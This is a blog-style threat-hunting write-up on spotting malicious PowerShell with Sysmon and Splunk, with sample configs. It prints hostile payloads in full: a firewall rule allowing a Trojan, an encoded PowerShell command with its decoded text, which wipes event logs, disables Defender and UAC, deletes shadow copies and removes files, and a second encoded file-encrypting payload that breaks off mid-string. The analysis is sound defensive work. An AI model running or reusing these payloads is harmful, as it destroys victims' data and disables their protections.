Windows PowerShell is a command shell very useful for administrative purpose, but at the same time can be abused across different phases of an intrusion and it is being actively used by malware developers. For these reasons, I'm interesting in hunting, using Sysmon and Splunk, when PowerShell is used for bad purposes. The setup is very simple: Windows Machine(s) with Splunk Forwader and Sysmon. The two necessary files to configured are inputs.conf and config.xml.
A simple inputs.conf file in the forwarder is the following:
C:\Program Files\SplunkUniversalForwarder\etc\apps\SplunkUniversalForwarder\default\inputs.conf
# Version 6.4.5 # these here just override and disable stuff that in system/default. ################################ # Data thru parsingQueue always ################################ [splunktcp] route=has_key:tautology:parsingQueue;absent_key:tautology:parsingQueue ################################ # Make sure these get forwarded ################################ [monitor://$SPLUNK_HOME\var\log\splunk\splunkd.log] _TCP_ROUTING = * index = _internal [monitor://$SPLUNK_HOME\var\log\splunk\metrics.log] _TCP_ROUTING = * index = _internal [WinEventLog://Microsoft-Windows-Sysmon/Operational] disabled = false renderXml = true
Regarding the config.xml file for sysmon, it is key to customise the file for each specific environment in order to reduce the noise and catch all the interesting events. In my case, I have used a very simple one which works for my test environment and doesn't create much noise. A more advance template to use is the one created by @SwiftOnSecurity.
<Sysmon schemaversion="3.2"> <HashAlgorithms>MD5</HashAlgorithms> <EventFiltering> <!-- Log all drivers except if the signature --> <!-- contains Microsoft or Windows --> <DriverLoad onmatch="exclude"> <Signature condition="contains">microsoft</Signature> <Signature condition="contains">windows</Signature> </DriverLoad> <NetworkConnect onmatch="include"> <DestinationPort>443</DestinationPort> <DestinationPort>80</DestinationPort> </NetworkConnect> <!-- Exclude certain processes that cause high event volumes --> <ProcessCreate onmatch="exclude"> <Image condition="contains">splunk</Image> <Image condition="contains">streamfwd</Image> <Image condition="contains">splunkd</Image> <Image condition="contains">splunkD</Image> <Image condition="contains">splunk</Image> <Image condition="contains">splunk-optimize</Image> <Image condition="contains">splunk-MonitorNoHandle</Image> <Image condition="contains">splunk-admon</Image> <Image condition="contains">splunk-netmon</Image> <Image condition="contains">splunk-regmon</Image> <Image condition="contains">splunk-winprintmon</Image> <Image condition="contains">btool</Image> <Image condition="contains">PYTHON</Image> </ProcessCreate> <ProcessTerminate onmatch="exclude"> <Image condition="contains">splunk</Image> <Image condition="contains">streamfwd</Image> <Image condition="contains">splunkd</Image> <Image condition="contains">splunkD</Image> <Image condition="contains">splunk</Image> <Image condition="contains">splunk-optimize</Image> <Image condition="contains">splunk-MonitorNoHandle</Image> <Image condition="contains">splunk-admon</Image> <Image condition="contains">splunk-netmon</Image> <Image condition="contains">splunk-regmon</Image> <Image condition="contains">splunk-winprintmon</Image> <Image condition="contains">btool</Image> <Image condition="contains">PYTHON</Image> </ProcessTerminate> <FileCreateTime onmatch="exclude"> <Image condition="contains">splunk</Image> <Image condition="contains">streamfwd</Image> <Image condition="contains">splunkd</Image> <Image condition="contains">splunkD</Image> <Image condition="contains">splunk</Image> <Image condition="contains">splunk-optimize</Image> <Image condition="contains">splunk-MonitorNoHandle</Image> <Image condition="contains">splunk-admon</Image> <Image condition="contains">splunk-netmon</Image> <Image condition="contains">splunk-regmon</Image> <Image condition="contains">splunk-winprintmon</Image> <Image condition="contains">btool</Image> <Image condition="contains">PYTHON</Image> </FileCreateTime> </EventFiltering> </Sysmon>
As I said, I'm interested in any PowerShell command spawned and the parent process associated. With a simple SPL query I get straight forward all the PowerShell commands executed, as showed below
Let's analyse each of the executed PowerShell commands from the screenshot above
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.rar
This command is using the 'ExecutionPolicy bypass' option. According to some documentation the PowerShell Execution Policy was not designed as security control, but as a control to limit mistakes done by sysadmins. https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
In any case, any PowerShell command using that option should be consider suspicious.
It also runs with the option "windowstyle hidden" to hide the prompt. Although this is a not bad indicator 'per se' and some valid scripts can run in the background with this option, this indicator together with any additional other indicator should raise an alert.
In the command above there is another suspicious thing: the 'rar' extension of the file executed by the PowerShell. Looking to any process launched by that Command, as ParentComandLine, I get the following:
So basically, I see that the PowerShell command invokes a cmd.exe to execute the 'rar' file, which means it is not a compress 'rar' file. Following the flow I see that SafetyTest.rar invokes another command: "C:\Users\angel\AppData\Local\Temp\Trojan.exe"
netsh firewall add allowedprogram "C:\Users\angel\AppData\Local\Temp\Trojan.exe" "Trojan.exe" ENABLE
Trojan.exe creates a rule in the firewall to allow itself in the firewall, very very suspicious activity and further investigation should be done in that system.
powershell -win hidden -enc
dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewANAAoAdwBlAHYAdAB1AHQAaQBsACAAZQBsACAAfAAgAEYAbwByAGUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAdwBlAHYAdAB1AHQAaQBsACAAYwBsACAAIgAkAF8AIgB9AA0ACgBSAEUARwAgAGEAZABkACAAIgBIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAiACAALwB2ACAARABpAHMAYQBiAGwAZQBDAE0ARAAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMgAgAC8AZgANAAoAUgBFAEcAIABBAEQARAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAvAHYAIABFAG4AYQBiAGwAZQBMAFUAQQAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgANAAoAbgBlAHQAIABzAHQAbwBwACAAVgBTAFMAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAHMAZQByAHYAaQBjAGUAcwBcAFYAUwBTACIAIAAvAHYAIABTAHQAYQByAHQAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADQAIAAvAGYAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBjADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBkADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBlADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBmADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQBnADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB4ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB5ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQAOwAgAHYAcwBzAGEAZABtAGkAbgAgAGQAZQBsAGUAdABlACAAcwBoAGEAZABvAHcAcwAgAC8AZgBvAHIAPQB6ADoAIAAvAGEAbABsACAALwBxAHUAaQBlAHQADQAKAG4AZQB0AHMAaAAgAGEAZAB2AGYAaQByAGUAdwBhAGwAbAAgAHMAZQB0ACAAYQBsAGwAcAByAG8AZgBpAGwAZQBzACAAcwB0AGEAdABlACAAbwBmAGYADQAKAHMAYwAgAGMAbwBuAGYAaQBnACAAdwBzAGMAcwB2AGMAIABzAHQAYQByAHQAPQAgAGQAaQBzAGEAYgBsAGUAZAANAAoAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAvAHYAIABEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADEAIAAvAGYADQAKAG4AZQB0ACAAcwB0AG8AcAAgAFcAaQBuAEQAZQBmAGUAbgBkADsAIABzAGMAIABjAG8AbgBmAGkAZwAgAFcAaQBuAEQAZQBmAGUAbgBkAD0AIABkAGkAcwBhAGIAbABlAGQAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAHMAZQByAHYAaQBjAGUAcwBcAFcAaQBuAEQAZQBmAGUAbgBkACIAIAAvAHYAIABTAHQAYQByAHQAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADQAIAAvAGYAOwAgAFIARQBHACAAYQBkAGQAIAAiAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIgAgAC8AdgAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmADsAIABzAGMAIABkAGUAbABlAHQAZQAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBSAEUARwAgAGEAZABkACAAIgBIAEsATABNAFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AIgAgAC8AdgAgAEUAbgBhAGIAbABlAFMAbQBhAHIAdABTAGMAcgBlAGUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgA7ACAAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEgAbwBzAHQAIgAgAC8AdgAgAEUAbgBhAGIAbABlAFMAbQBhAHIAdABTAGMAcgBlAGUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMAAgAC8AZgANAAoAbgBlAHQAIABzAHQAbwBwACAAdwB1AGEAdQBzAGUAcgB2AA0ACgBOAGUAdAAgAHUAcwBlAHIAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFACAALwBhAGMAdABpAHYAZQA6AG4AbwANAAoAIwBZAEMAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAbABzAGEAcwBzACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHMAbQBzAHMAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAYwBvAG4AaABvAHMAdAAgAC0ARgBvAHIAYwBlADsAIABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABkAHcAbQAgAC0ARgBvAHIAYwBlADsAIABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAHYAYwBoAG8AcwB0ACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAGUAeABwAGwAbwByAGUAcgAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAHQAZQBhAG0AIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAHsAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAoAHgAOAA2ACkAfQAgACsAIAAiAFwAUwB0AGUAYQBtACIAKQAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABzAGsAeQBwAGUAIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAgACsAIAAiAFwAUwBrAHkAcABlACIAKQAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIAB0AHMAMwBjAGwAaQBlAG4AdABfAHcAaQBuADYANAAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACIAXABUAFMAMwBDAGwAaQBlAG4AdAAiACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQANAAoAUgBFAEcAIABhAGQAZAAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALwB2ACAATgBvAEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmAA0ACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoAFsAZQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AGcAZQB0AGYAbwBsAGQAZQByAHAAYQB0AGgAKAAiAEQAZQBzAGsAdABvAHAAIgApACAAKwAgACIAXAAqAC4AKgAiACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAIgBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAZQBzAGsAdABvAHAAXAAqAC4AKgAiACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUADQAKAFIARQBHACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC8AdgAgAE4AbwBSAHUAbgAgAC8AdAAgAFIARQBHAF8ARABXAE8AUgBEACAALwBkACAAMQAgAC8AZgANAAoAIwBaAEEAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAASQBFAHgAcABsAG8AcgBlACAALQBGAG8AcgBjAGUAOwAgAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAUwB0AGUAYQBtACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFMAawB5AHAAZQAgAC0ARgBvAHIAYwBlAA0ACgAjAFoARABrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABDAGgAcgBvAG0AZQAgAC0ARgBvAHIAYwBlAA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABGAGkAcgBlAGYAbwB4ACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHQAcwAzAGMAbABpAGUAbgB0AF8AdwBpAG4ANgA0ACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAE8AcgBpAGcAaQBuACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFcAbwByAGQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAARQB4AGMAZQBsACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAFAAbwB3AGUAcgBwAG8AaQBuAHQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAUABpAGQAZwBpAG4AIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAATwBwAGUAcgBhACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAEMAeQBiAGUAcgBHAGgAbwBzAHQAIAAtAEYAbwByAGMAZQANAAoAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBUAHUAbgBlAHMAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBUAHUAbgBlAHMASABlAGwAcABlAHIAIAAtAEYAbwByAGMAZQA7ACAAawBpAGwAbAAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAaQBQAG8AZABTAGUAcgB2AGkAYwBlACAALQBGAG8AcgBjAGUADQAKAGsAaQBsAGwAIAAtAHAAcgBvAGMAZQBzAHMAbgBhAG0AZQAgAHYAbABjACAALQBGAG8AcgBjAGUADQAKAH0A
The command, when decoded, contains the following set of commands:
while($true){ wevtutil el | Foreach-Object {wevtutil cl "$_"} REG add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f net stop VSS; REG add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f; vssadmin delete shadows /for=c: /all /quiet; vssadmin delete shadows /for=d: /all /quiet; vssadmin delete shadows /for=e: /all /quiet; vssadmin delete shadows /for=f: /all /quiet; vssadmin delete shadows /for=g: /all /quiet; vssadmin delete shadows /for=x: /all /quiet; vssadmin delete shadows /for=y: /all /quiet; vssadmin delete shadows /for=z: /all /quiet netsh advfirewall set allprofiles state off sc config wscsvc start= disabled REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f net stop WinDefend; sc config WinDefend= disabled; REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f; REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f; sc delete windefend REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f; REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableSmartScreen /t REG_DWORD /d 0 /f net stop wuauserv Net user $env:USERNAME /active:no #YCkill -processname lsass -Force; kill -processname smss -Force; kill -processname conhost -Force; kill -processname dwm -Force; kill -processname svchost -Force; kill -processname explorer -Force kill -processname steam -Force; Remove-Item (${env:ProgramFiles(x86)} + "\Steam") -Recurse -Force kill -processname skype -Force; Remove-Item ($env:APPDATA + "\Skype") -Recurse -Force kill -processname ts3client_win64 -Force; Remove-Item ($env:APPDATA + "\TS3Client") -Recurse -Force REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f Remove-Item ([environment]::getfolderpath("Desktop") + "\*.*") -Recurse -Force; Remove-Item "C:\Users\Public\Desktop\*.*" -Recurse -Force REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f #ZAkill -processname IExplore -Force; kill -processname MicrosoftEdge -Force kill -processname Steam -Force kill -processname Skype -Force #ZDkill -processname Chrome -Force kill -processname Firefox -Force kill -processname ts3client_win64 -Force kill -processname Origin -Force kill -processname Word -Force kill -processname Excel -Force kill -processname Powerpoint -Force kill -processname Pidgin -Force kill -processname Opera -Force kill -processname CyberGhost -Force kill -processname iTunes -Force; kill -processname iTunesHelper -Force; kill -processname iPodService -Force kill -processname vlc -Force
powershell -win hidden -enc JABwAGEAcwBzAD0AKAAnAEkAdwBCAEgAQQBHADgAQQBOAHcAQgBTAEEARABjAEEAYwBBAEIAbABBAEcAUQBBAFEAZwBCADUAQQBIAGMAQQBZAFEAQgA2AEEARwBrAEEAZQBBAEEAagBBAEEAPQA9ACcAKQANAAoAJABkAHIAaQB2AGUAcwAgAD0AIAA2ADUALgAuADkAMAAgAHwAIABmAG8AcgBlAGEAYwBoACAAewBbAGMAaABhAHIAXQAkAF8AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AagBwAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGoAcABlAGcAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjAHgAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHYAIABpAG4AIAAkAGQAcgBpAHYAZQBzACkAIAB7AGYAbwByAGUAYQBjAGgAKAAkAGkAdABlAG0AIABpAG4AIAAoAEcAZQB0AC0AQwBoAGkAbABkAGkAdABlAG0AIAAoACQAZAByAHYAIAArACAAIgA6AFwAIgApACAALQByAGUAYwB1AHIAcwBlACAALQBmAGkAbAB0AGUAcgAgACIAKgAuAGQAbwBjACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwB4ACIAKQApAHsAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaABlAGwAcABlAHIALgBlAHgAZQAgAC0AZQAgACQAcABhAHMAcwAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACgAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBjAHIAeQBwAHQAIgApADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAfQB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAaQB2AGUAcwApACAAewBmAG8AcgBlAGEAYwBoACgAJABpAHQAZQBtACAAaQBuACAAKABHAGUAdAAtAEMAaABpAGwAZABpAHQAZQBtACAAKAAkAGQAcgB2ACAAKwAgACIAOgBcACIAKQAgAC0AcgBlAGMAdQByAHMAZQAgAC0AZgBpAGwAdABlAHIAIAAiACoALgB4AGwAcwAiACkAKQB7AEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGgAZQBsAHAAZQByAC4AZQB4AGUAIAAtAGUAIAAkAHAAYQBzAHMAIAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAoACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQAgACsAIAAiAC4AYwByAHkAcAB0ACIAKQA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlAH0AfQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABkAHIAdgAgAGkAbgAgACQAZAByAGkAdgBlAHMAKQAgAHsAZgBvAHIAZQBhAGMAaAAoACQAaQB0AGUAbQAgAGkAbgAgACgARwBlAHQALQBDAGgAaQBsAGQAaQB0AGUAbQAgACgAJABkAHIAdgAgACsAIAAiADoAXAAiACkAIAAtAHIAZQBjAHUAcgBzAGUAIAAtAGYAaQBsAHQAZQByACAAIgAqAC4AcABwAHQAIgApACkAewBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABoAGUAbABwAGUAcgAuAGUAeABlACAALQBlACAAJABwAGEAcwBzACAAJABpAHQAZQBtAC4ARgB1AGwAbABOAGEAbQBlACAAKAAkAGkAdABlAG0ALgBGAHUAbABsAE4AYQBtAGUAIAArACAAIgAuAGMAcgB5AHAAdAAiACkAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQAaQB0AGUAbQAuAEYAdQBsAGwATgBhAG0AZQB9AH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAZAByAHY